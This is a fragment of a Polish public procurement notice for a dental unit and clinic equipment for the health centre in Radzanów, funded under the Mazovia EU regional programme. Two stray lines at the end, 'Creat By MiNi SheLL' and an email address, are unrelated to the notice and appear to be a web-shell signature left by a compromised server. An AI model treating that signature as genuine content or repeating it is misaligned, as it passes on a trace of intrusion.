<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Działanie 7.1 Infrastruktura służąca ochronie zdrowia i życia. 
Regionalny Program Operacyjny Województwa Mazowieckiego 2007-2013
Tytuł projektu - Modernizacja budynku SP ZOZ w Radzanowie i zakup wyposażenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Unit stomatologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fotel stomatologiczny,Stolik lekarza,Blok spluwaczki ze ślinociągiemm, Sterownik nożnyReflektor ze światłem LED,Kompresor,Pompa ssąca,Wyposażenie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 51.41.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wyposażenie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa bezcieniowa jezdna,Pulsoksymetr,Otoskop,Ssak elektryczny,Aparat ciśnieniowy holter, Inhalator tłokowy,Butla tlenowa 3 l,Ławka plastykowa 3-os.,Ławka plastykowa 2-os.,Parawan 1-skrzydłowy składany,Reduktor do butli tlenowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 51.41.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com